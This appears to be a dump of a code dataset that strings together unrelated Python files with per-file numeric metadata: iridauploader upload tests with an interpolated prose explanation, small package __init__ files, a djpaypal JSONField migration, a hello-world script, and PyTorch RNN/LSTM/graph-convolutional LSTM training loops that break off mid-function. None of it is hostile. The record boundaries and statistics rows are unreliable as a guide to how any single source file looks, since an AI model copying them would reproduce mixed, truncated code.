self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
mock_upload_helpers.directory_has_readonly_conflict.assert_called_with(stub_directory_status.directory)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
class TestBatchUploadSingleEntry(unittest.TestCase):
"""
Tests the core.upload.batch_upload_single_entry function
"""
def setUp(self):
print("\nStarting " + self.__module__ + ": " + self._testMethodName)
config._init_config_parser()
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.parsing_handler")
def test_valid(self, mock_parsing_handler, mock_validate_and_upload):
"""
Makes sure that _validate_and_upload is only called on a new run
:return:
"""
class StubDirectoryStatus:
def __init__(self, directory, status):
self.directory = directory
self.status = status
self.message = None
def status_equals(self, other_status):
return self.status == other_status
# add mock data to the function calls that are essential
stub_directory_status_valid = StubDirectoryStatus("valid", DirectoryStatus.NEW)
stub_directory_status_invalid = StubDirectoryStatus("invalid", DirectoryStatus.INVALID)
stub_directory_status_complete = StubDirectoryStatus("complete", DirectoryStatus.COMPLETE)
stub_directory_status_partial = StubDirectoryStatus("partial", DirectoryStatus.PARTIAL)
mock_parsing_handler.get_run_status_list.side_effect = [
[stub_directory_status_valid,
stub_directory_status_invalid,
stub_directory_status_complete,
stub_directory_status_partial]
]
mock_parsing_handler.parse_and_validate.side_effect = ["Fake Sequencing Run"]
# start
upload.batch_upload_single_entry("fake_directory", upload_mode=MODE_DEFAULT)
# validate calls only happen once
mock_validate_and_upload.assert_called_once_with(stub_directory_status_valid, MODE_DEFAULT, False)
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.parsing_handler")
def test_valid_force(self, mock_parsing_handler, mock_validate_and_upload):
"""
Makes sure that _validate_and_upload is called on all runs except invalid
:return:
"""
class StubDirectoryStatus:
def __init__(self, directory, status):
self.directory = directory
self.status = status
self.message = None
def status_equals(self, other_status):
return self.status == other_status
# add mock data to the function calls that are essential
stub_directory_status_valid = StubDirectoryStatus("valid", DirectoryStatus.NEW)
stub_directory_status_invalid = StubDirectoryStatus("invalid", DirectoryStatus.INVALID)
stub_directory_status_complete = StubDirectoryStatus("complete", DirectoryStatus.COMPLETE)
stub_directory_status_partial = StubDirectoryStatus("partial", DirectoryStatus.PARTIAL)
mock_parsing_handler.get_run_status_list.side_effect = [
[stub_directory_status_valid,
stub_directory_status_invalid,
stub_directory_status_complete,
stub_directory_status_partial]
]
mock_parsing_handler.parse_and_validate.side_effect = ["Fake Sequencing Run"]
# start
upload.batch_upload_single_entry("fake_directory", force_upload=True)
# assert calls are what we expect
self.assertEqual(mock_validate_and_upload.call_count, 3, "Expected 3 calls to mock_validate_and_upload")
expected_call_args = [
call(stub_directory_status_valid, MODE_DEFAULT, False),
call(stub_directory_status_complete, MODE_DEFAULT, False),
call(stub_directory_status_partial, MODE_DEFAULT, False)
]
self.assertEqual(mock_validate_and_upload.call_args_list, expected_call_args, "Call args do not match expected")
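The two batch tests above use the same three-part pattern found throughout this suite: a hand-rolled stub exposing only the attributes the code under test reads, side_effect lists that script each mocked call exactly once, and call_args_list assertions that pin down which runs were uploaded and in what order. A minimal, self-contained sketch of that pattern, with all names hypothetical rather than taken from iridauploader:
import unittest
from unittest.mock import Mock

def upload_new_runs(handler, uploader):
    # Hypothetical function under test: upload every run whose status is "new".
    for status in handler.get_run_status_list():
        if status.status_equals("new"):
            uploader(status)

class StubStatus:
    """Stub exposing only the two members upload_new_runs reads."""
    def __init__(self, directory, status):
        self.directory = directory
        self.status = status

    def status_equals(self, other_status):
        return self.status == other_status

class TestUploadNewRuns(unittest.TestCase):
    def test_only_new_runs_are_uploaded(self):
        new_run = StubStatus("new_dir", "new")
        done_run = StubStatus("done_dir", "complete")
        handler = Mock()
        handler.get_run_status_list.side_effect = [[new_run, done_run]]
        uploader = Mock()
        upload_new_runs(handler, uploader)
        # Only the new run reaches the uploader, exactly once.
        uploader.assert_called_once_with(new_run)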
| 43.102389
| 120
| 0.714546
| 2,889
| 25,258
| 5.824507
| 0.056075
| 0.114994
| 0.112914
| 0.09984
| 0.900755
| 0.891068
| 0.880371
| 0.864741
| 0.862899
| 0.862899
| 0
| 0.000452
| 0.212329
| 25,258
| 585
| 121
| 43.176068
| 0.845338
| 0.108203
| 0
| 0.737805
| 0
| 0
| 0.146764
| 0.120055
| 0
| 0
| 0
| 0
| 0.146341
| 1
| 0.088415
| false
| 0.018293
| 0.02439
| 0.02439
| 0.155488
| 0.012195
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 491c8062c63b9b5e751ed8bae4e0a1bd765db59f
| 84
| py
| Python
| src/python/lib/__init__.py
| hindsights/gml
| 876810c9dc3a33731e0df9dce9dfd68a655c6330
| ["MIT"] | 3
| 2018-03-01T13:34:00.000Z
| 2018-04-02T03:02:22.000Z
| src/python/lib/__init__.py
| hindsights/gml
| 876810c9dc3a33731e0df9dce9dfd68a655c6330
| ["MIT"] | null | null | null
| src/python/lib/__init__.py
| hindsights/gml
| 876810c9dc3a33731e0df9dce9dfd68a655c6330
| ["MIT"] | null | null | null |
# Package-level aggregator: import each submodule and collect everything it loads.
from . import core
from . import lang
def loadAll():
    return [core.loadAll(), lang.loadAll()]
| 14
| 43
| 0.690476
| 11
| 84
| 5.272727
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 84
| 5
| 44
| 16.8
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 7
| 4974aedd87921fb3cf7bd46c72f90c5e6165a0e6
| 122
| py
| Python
| gitfu/commands/__init__.py
| domanchi/gitfu
| e856be58634f44f743e48f3881bc2e3a9cf35e1c
| ["MIT"] | 2
| 2017-09-26T03:12:49.000Z
| 2022-01-23T10:50:10.000Z
| gitfu/commands/__init__.py
| domanchi/gitfu
| e856be58634f44f743e48f3881bc2e3a9cf35e1c
| ["MIT"] | null | null | null
| gitfu/commands/__init__.py
| domanchi/gitfu
| e856be58634f44f743e48f3881bc2e3a9cf35e1c
| ["MIT"] | null | null | null |
# TODO: maybe we can do some magic initialization here.
from .check import run as check
from .commit import run as commit
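The TODO above gestures at replacing the hand-written per-command imports with automatic discovery. One way to do that "magic initialization" is to walk the package with pkgutil and collect each submodule's run callable. A sketch under the assumption that every command module exposes run, which the two imports above suggest but gitfu itself does not guarantee:
import importlib
import pkgutil

def discover_commands(package):
    """Map each submodule name to its `run` callable, skipping modules without one."""
    commands = {}
    for module_info in pkgutil.iter_modules(package.__path__):
        module = importlib.import_module(package.__name__ + "." + module_info.name)
        run = getattr(module, "run", None)
        if callable(run):
            commands[module_info.name] = run
    return commands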
| 30.5
| 55
| 0.778689
| 21
| 122
| 4.52381
| 0.714286
| 0.189474
| 0.231579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180328
| 122
| 3
| 56
| 40.666667
| 0.95
| 0.434426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 7
| 4977a547da814a1f56653abab8f25aba7f2f126c
| 4,349
| py
| Python
| src/djpaypal/migrations/0014_use_models_jsonfield.py
| jleclanche/dj-paypal
| 3e45d4e1a1bf7346a33f7cc8d17f7660cf8b63c4
| ["MIT"] | 1
| 2017-08-21T03:39:03.000Z
| 2017-08-21T03:39:03.000Z
| src/djpaypal/migrations/0014_use_models_jsonfield.py
| jleclanche/dj-paypal
| 3e45d4e1a1bf7346a33f7cc8d17f7660cf8b63c4
| ["MIT"] | null | null | null
| src/djpaypal/migrations/0014_use_models_jsonfield.py
| jleclanche/dj-paypal
| 3e45d4e1a1bf7346a33f7cc8d17f7660cf8b63c4
| ["MIT"] | null | null | null |
# Generated by Django 3.2.13 on 2022-05-11 15:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('djpaypal', '0013_billing_agreement_plan_model'),
]
operations = [
migrations.AlterField(
model_name='billingagreement',
name='agreement_details',
field=models.JSONField(),
),
migrations.AlterField(
model_name='billingagreement',
name='merchant',
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='billingagreement',
name='override_charge_mode',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='billingagreement',
name='override_merchant_preferences',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='billingagreement',
name='payer',
field=models.JSONField(),
),
migrations.AlterField(
model_name='billingagreement',
name='plan',
field=models.JSONField(),
),
migrations.AlterField(
model_name='billingagreement',
name='shipping_address',
field=models.JSONField(null=True),
),
migrations.AlterField(
model_name='billingplan',
name='merchant_preferences',
field=models.JSONField(),
),
migrations.AlterField(
model_name='dispute',
name='dispute_outcome',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='dispute',
name='disputed_transactions',
field=models.JSONField(editable=False),
),
migrations.AlterField(
model_name='dispute',
name='messages',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='dispute',
name='offer',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='dispute',
name='refund_details',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='payer',
name='shipping_address',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='payment',
name='payer',
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='payment',
name='redirect_urls',
field=models.JSONField(),
),
migrations.AlterField(
model_name='payment',
name='transactions',
field=models.JSONField(),
),
migrations.AlterField(
model_name='preparedbillingagreement',
name='data',
field=models.JSONField(),
),
migrations.AlterField(
model_name='sale',
name='fmf_details',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='sale',
name='payment_hold_reasons',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='sale',
name='processor_response',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='webhookevent',
name='resource',
field=models.JSONField(editable=False),
),
migrations.AlterField(
model_name='webhookevent',
name='transmissions',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='webhookeventtrigger',
name='headers',
field=models.JSONField(),
),
]
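This migration is the routine cleanup that follows a switch from django.contrib.postgres.fields.JSONField to the cross-database models.JSONField Django has shipped since 3.1: every affected column is re-declared with the new field class while keeping its blank/null/default/editable options. On the model side the change is only the field class; a sketch for one of the models touched above, with field names taken from the operations and everything else hypothetical:
from django.db import models

class BillingAgreement(models.Model):
    # models.JSONField (Django >= 3.1) replaces the postgres-only JSONField.
    agreement_details = models.JSONField()
    merchant = models.JSONField(blank=True, null=True)
    override_charge_mode = models.JSONField(blank=True, default=dict)
    shipping_address = models.JSONField(null=True)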
| 32.455224
| 74
| 0.55438
| 362
| 4,349
| 6.538674
| 0.198895
| 0.202788
| 0.253485
| 0.294043
| 0.815378
| 0.795099
| 0.705112
| 0.607098
| 0.597803
| 0.457964
| 0
| 0.006885
| 0.33203
| 4,349
| 133
| 75
| 32.699248
| 0.807917
| 0.010577
| 0
| 0.748032
| 1
| 0
| 0.142525
| 0.024878
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007874
| 0
| 0.031496
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 499eaf7dfc00dd82f39686fb71efeac535b2d299
| 61
| py
| Python
| dir2/my_code2.py
| jonnyv5/jv_pynet
| 95ffeb904de0300a34ace954945d61363a6ea246
| ["Apache-2.0"] | null | null | null
| dir2/my_code2.py
| jonnyv5/jv_pynet
| 95ffeb904de0300a34ace954945d61363a6ea246
| ["Apache-2.0"] | null | null | null
| dir2/my_code2.py
| jonnyv5/jv_pynet
| 95ffeb904de0300a34ace954945d61363a6ea246
| ["Apache-2.0"] | null | null | null |
print("hello world code2.py")
print("hello world code2.py")
| 15.25
| 29
| 0.721311
| 10
| 61
| 4.4
| 0.5
| 0.454545
| 0.681818
| 0.909091
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037037
| 0.114754
| 61
| 3
| 30
| 20.333333
| 0.777778
| 0
| 0
| 1
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 10
| b8e95fc4549cb871acb3842bcd4518eb48a97815
| 23,615
| py
| Python
| Code_V1/Train_Validate.py
| zhiyongc/Graph_Convolutional_LSTM
| a703b63e626b1e2563fe3f45d9714e468b1d4a0e
| ["MIT"] | 281
| 2018-05-01T03:38:50.000Z
| 2022-03-26T12:33:27.000Z
| Code_V1/Train_Validate.py
| zhiyongc/GraphConvolutionalLSTM
| a703b63e626b1e2563fe3f45d9714e468b1d4a0e
| ["MIT"] | 5
| 2018-11-21T09:32:46.000Z
| 2021-03-29T07:23:16.000Z
| Code_V1/Train_Validate.py
| zhiyongc/GraphConvolutionalLSTM
| a703b63e626b1e2563fe3f45d9714e468b1d4a0e
| ["MIT"] | 101
| 2018-06-25T08:48:12.000Z
| 2022-03-13T16:37:51.000Z |
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 7 23:40:32 2018
@author: Zhiyong
"""
import torch
import numpy as np
from torch.autograd import Variable
import time
from Models import *
def TrainRNN(train_dataloader, valid_dataloader, num_epochs = 3):
inputs, labels = next(iter(train_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
input_dim = fea_size
hidden_dim = fea_size
output_dim = fea_size
rnn = RNN(input_dim, hidden_dim, output_dim)
rnn.cuda()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
learning_rate = 1e-5
optimizer = torch.optim.RMSprop(rnn.parameters(), lr = learning_rate)
use_gpu = torch.cuda.is_available()
interval = 100
losses_train = []
losses_interval_train = []
losses_valid = []
losses_interval_valid = []
cur_time = time.time()
pre_time = time.time()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
trained_number = 0
valid_dataloader_iter = iter(valid_dataloader)
for data in train_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
rnn.zero_grad()
# rnn.loop()
hidden = rnn.initHidden(batch_size)
outputs = None
for i in range(10):
outputs, hidden = rnn(torch.squeeze(inputs[:,i:i+1,:]), hidden)
#######
loss_train = loss_MSE(outputs, labels)
losses_train.append(loss_train.data)
optimizer.zero_grad()
loss_train.backward()
optimizer.step()
# validation
try:
inputs_val, labels_val = next(valid_dataloader_iter)
except StopIteration:
valid_dataloader_iter = iter(valid_dataloader)
inputs_val, labels_val = next(valid_dataloader_iter)
if use_gpu:
inputs_val, labels_val = Variable(inputs_val.cuda()), Variable(labels_val.cuda())
else:
inputs_val, labels_val = Variable(inputs_val), Variable(labels_val)
hidden = rnn.initHidden(batch_size)
outputs = None
for i in range(10):
outputs, hidden = rnn(torch.squeeze(inputs_val[:,i:i+1,:]), hidden)
loss_valid = loss_MSE(outputs, labels_val)
losses_valid.append(loss_valid.data)
# output
trained_number += 1
if trained_number % interval == 0:
cur_time = time.time()
loss_interval_train = np.around(sum(losses_train[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_train.append(loss_interval_train)
loss_interval_valid = np.around(sum(losses_valid[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_valid.append(loss_interval_valid)
print('Iteration #: {}, train_loss: {}, valid_loss: {}, time: {}'.format(\
trained_number * batch_size, \
loss_interval_train,\
loss_interval_valid,\
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
return rnn, [losses_train, losses_interval_train, losses_valid, losses_interval_valid]
def TrainLSTM(train_dataloader, valid_dataloader, num_epochs = 3):
inputs, labels = next(iter(train_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
input_dim = fea_size
hidden_dim = fea_size
output_dim = fea_size
lstm = LSTM(input_dim, hidden_dim, output_dim)
lstm.cuda()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
learning_rate = 1e-5
optimizer = torch.optim.RMSprop(lstm.parameters(), lr = learning_rate)
use_gpu = torch.cuda.is_available()
interval = 100
losses_train = []
losses_interval_train = []
losses_valid = []
losses_interval_valid = []
cur_time = time.time()
pre_time = time.time()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
trained_number = 0
valid_dataloader_iter = iter(valid_dataloader)
for data in train_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
lstm.zero_grad()
Hidden_State, Cell_State = lstm.loop(inputs)
loss_train = loss_MSE(Hidden_State, labels)
losses_train.append(loss_train.data)
optimizer.zero_grad()
loss_train.backward()
optimizer.step()
# validation
try:
inputs_val, labels_val = next(valid_dataloader_iter)
except StopIteration:
valid_dataloader_iter = iter(valid_dataloader)
inputs_val, labels_val = next(valid_dataloader_iter)
if use_gpu:
inputs_val, labels_val = Variable(inputs_val.cuda()), Variable(labels_val.cuda())
else:
inputs_val, labels_val = Variable(inputs_val), Variable(labels_val)
Hidden_State, Cell_State = lstm.loop(inputs_val)
loss_valid = loss_MSE(Hidden_State, labels_val)
losses_valid.append(loss_valid.data)
# output
trained_number += 1
if trained_number % interval == 0:
cur_time = time.time()
loss_interval_train = np.around(sum(losses_train[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_train.append(loss_interval_train)
loss_interval_valid = np.around(sum(losses_valid[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_valid.append(loss_interval_valid)
print('Iteration #: {}, train_loss: {}, valid_loss: {}, time: {}'.format(\
trained_number * batch_size, \
loss_interval_train,\
loss_interval_valid,\
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
return lstm, [losses_train, losses_interval_train, losses_valid, losses_interval_valid]
def TrainGraphConvolutionalLSTM(train_dataloader, valid_dataloader, A, FFR, K, back_length = 3, num_epochs = 3, Clamp_A=False):
inputs, labels = next(iter(train_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
input_dim = fea_size
hidden_dim = fea_size
output_dim = fea_size
gclstm = GraphConvolutionalLSTM(K, torch.Tensor(A), FFR[back_length], A.shape[0], Clamp_A=Clamp_A)
gclstm.cuda()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
learning_rate = 1e-5
optimizer = torch.optim.RMSprop(gclstm.parameters(), lr = learning_rate)
use_gpu = torch.cuda.is_available()
interval = 100
losses_train = []
losses_interval_train = []
losses_valid = []
losses_interval_valid = []
cur_time = time.time()
pre_time = time.time()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
trained_number = 0
# validation data loader iterator init
valid_dataloader_iter = iter(valid_dataloader)
for data in train_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
gclstm.zero_grad()
Hidden_State, Cell_State = gclstm.loop(inputs)
loss_train = loss_MSE(Hidden_State, labels)
optimizer.zero_grad()
loss_train.backward()
optimizer.step()
losses_train.append(loss_train.data)
# validation
try:
inputs_val, labels_val = next(valid_dataloader_iter)
except StopIteration:
valid_dataloader_iter = iter(valid_dataloader)
inputs_val, labels_val = next(valid_dataloader_iter)
if use_gpu:
inputs_val, labels_val = Variable(inputs_val.cuda()), Variable(labels_val.cuda())
else:
inputs_val, labels_val = Variable(inputs_val), Variable(labels_val)
Hidden_State, Cell_State = gclstm.loop(inputs_val)
loss_valid = loss_MSE(Hidden_State, labels_val)
losses_valid.append(loss_valid.data)
# output
trained_number += 1
if trained_number % interval == 0:
cur_time = time.time()
loss_interval_train = np.around(sum(losses_train[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_train.append(loss_interval_train)
loss_interval_valid = np.around(sum(losses_valid[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_valid.append(loss_interval_valid)
print('Iteration #: {}, train_loss: {}, valid_loss: {}, time: {}'.format(\
trained_number * batch_size, \
loss_interval_train,\
loss_interval_valid,\
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
return gclstm, [losses_train, losses_interval_train, losses_valid, losses_interval_valid]
def TrainGraphConvolutionalLSTM_Proposed(train_dataloader, valid_dataloader, A, FFR, K, back_length = 3, num_epochs = 3, Clamp_A=False, lambda_Aweight = 0.01, lambda_fea = 0.01):
inputs, labels = next(iter(train_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
input_dim = fea_size
hidden_dim = fea_size
output_dim = fea_size
gclstm = GraphConvolutionalLSTM(K, torch.Tensor(A), FFR[back_length-1], A.shape[0], Clamp_A=Clamp_A)
gclstm.cuda()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
learning_rate = 1e-5
optimizer = torch.optim.RMSprop(gclstm.parameters(), lr = learning_rate)
use_gpu = torch.cuda.is_available()
interval = 100
losses_train = []
losses_interval_train = []
losses_valid = []
losses_interval_valid = []
cur_time = time.time()
pre_time = time.time()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
trained_number = 0
# validation data loader iterator init
valid_dataloader_iter = iter(valid_dataloader)
for data in train_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
gclstm.zero_grad()
batch_size = inputs.size(0)
time_step = inputs.size(1)
Hidden_State, Cell_State = gclstm.initHidden(batch_size)
previous_grads = []
# Proposed Real Time Branching Learning Method
for i in range(time_step):
Hidden_State, Cell_State, gc = gclstm.forward(torch.squeeze(inputs[:,i:i+1,:]), Hidden_State, Cell_State)
gclstm.zero_grad()
if i != time_step - 1:
label_loss = loss_MSE(Hidden_State, torch.squeeze(inputs[:,i+1:i+2,:]))
else:
label_loss = loss_MSE(Hidden_State, labels)
# Graph Convolution Weight Regularization
weight_loss = 0
for idx in range(K):
gc_i_weight = gclstm.gc_list[idx].weight
A_i = gclstm.A_list[idx]
weight_loss+=loss_L1(torch.mul(gc_i_weight, Variable(A_i).cuda()), target=torch.zeros_like(gc_i_weight))
# Graph Convolution Features Regularization
gc_loss = 0
gc_features = torch.chunk(gc, K, 1)
for idx in range(K-1):
gc_i = gc_features[idx]
gc_i1 = gc_features[idx+1]
gc_loss = gc_loss + loss_MSE(Variable(gc_i.data).cuda(), Variable(gc_i1.data).cuda())
loss = label_loss + weight_loss * lambda_Aweight + gc_loss * lambda_Aweight
optimizer.zero_grad()
loss.backward()
curr_grad = [x.grad.data for x in list(gclstm.parameters())]
if len(previous_grads) != 0: # not null
previous_grads_sum = previous_grads[0] # sum of gradients in previous steps
for idx in range(1, len(previous_grads)):
pre_grad = previous_grads[idx]
previous_grads_sum += pre_grad
# add previous gradients to current step only for the LSTM weights and bias, not for GC weights
idx = 0
for x in list(gclstm.parameters()):
if idx >= K: # not add grads on GC1, GC2, GC3...
x.grad.data += previous_grads_sum[idx]
idx+=1
# only store fixed steps of previous gradients ( length = back_length)
if len(previous_grads) == back_length:
previous_grads.pop(0)
previous_grads.append(curr_grad)
else:
previous_grads.append(curr_grad)
optimizer.step()
Hidden_State, Cell_State = gclstm.reinitHidden(batch_size, Hidden_State.data, Cell_State.data)
loss_train = loss_MSE(Hidden_State, labels)
losses_train.append(loss_train.data)
# validation
try:
inputs_val, labels_val = next(valid_dataloader_iter)
except StopIteration:
valid_dataloader_iter = iter(valid_dataloader)
inputs_val, labels_val = next(valid_dataloader_iter)
if use_gpu:
inputs_val, labels_val = Variable(inputs_val.cuda()), Variable(labels_val.cuda())
else:
inputs_val, labels_val = Variable(inputs_val), Variable(labels_val)
Hidden_State, Cell_State = gclstm.loop(inputs_val)
loss_valid = loss_MSE(Hidden_State, labels_val)
losses_valid.append(loss_valid.data)
# output
trained_number += 1
if trained_number % interval == 0:
cur_time = time.time()
loss_interval_train = np.around(sum(losses_train[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_train.append(loss_interval_train)
loss_interval_valid = np.around(sum(losses_valid[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_valid.append(loss_interval_valid)
print('Iteration #: {}, train_loss: {}, valid_loss: {}, time: {}'.format(\
trained_number * batch_size, \
loss_interval_train,\
loss_interval_valid,\
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
return gclstm, [losses_train, losses_interval_train, losses_valid, losses_interval_valid]
def TestRNN(rnn, test_dataloader, max_speed):
inputs, labels = next(iter(test_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
cur_time = time.time()
pre_time = time.time()
use_gpu = torch.cuda.is_available()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
tested_batch = 0
losses_mse = []
losses_l1 = []
for data in test_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
# rnn.loop()
hidden = rnn.initHidden(batch_size)
outputs = None
for i in range(10):
outputs, hidden = rnn(torch.squeeze(inputs[:,i:i+1,:]), hidden)
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
loss_mse = loss_MSE(outputs, labels)
loss_l1 = loss_L1(outputs, labels)
losses_mse.append(loss_mse.data)
losses_l1.append(loss_l1.data)
tested_batch += 1
if tested_batch % 1000 == 0:
cur_time = time.time()
print('Tested #: {}, loss_l1: {}, loss_mse: {}, time: {}'.format( \
tested_batch * batch_size, \
np.around([loss_l1.data[0]], decimals=8), \
np.around([loss_mse.data[0]], decimals=8), \
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
losses_l1 = np.array(losses_l1)
losses_mse = np.array(losses_mse)
mean_l1 = np.mean(losses_l1) * max_speed
std_l1 = np.std(losses_l1) * max_speed
print('Tested: L1_mean: {}, L1_std : {}'.format(mean_l1, std_l1))
return [losses_l1, losses_mse, mean_l1, std_l1]
def TestLSTM(lstm, test_dataloader, max_speed):
inputs, labels = next(iter(test_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
cur_time = time.time()
pre_time = time.time()
use_gpu = torch.cuda.is_available()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
tested_batch = 0
losses_mse = []
losses_l1 = []
for data in test_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
Hidden_State, Cell_State = lstm.loop(inputs)
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
loss_mse = loss_MSE(Hidden_State, labels)
loss_l1 = loss_L1(Hidden_State, labels)
losses_mse.append(loss_mse.data)
losses_l1.append(loss_l1.data)
tested_batch += 1
if tested_batch % 1000 == 0:
cur_time = time.time()
print('Tested #: {}, loss_l1: {}, loss_mse: {}, time: {}'.format( \
tested_batch * batch_size, \
np.around([loss_l1.data[0]], decimals=8), \
np.around([loss_mse.data[0]], decimals=8), \
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
losses_l1 = np.array(losses_l1)
losses_mse = np.array(losses_mse)
mean_l1 = np.mean(losses_l1) * max_speed
std_l1 = np.std(losses_l1) * max_speed
print('Tested: L1_mean: {}, L1_std : {}'.format(mean_l1, std_l1))
return [losses_l1, losses_mse, mean_l1, std_l1]
def TestGraphConvolutionalLSTM(gclstm, test_dataloader, max_speed):
inputs, labels = next(iter(test_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
cur_time = time.time()
pre_time = time.time()
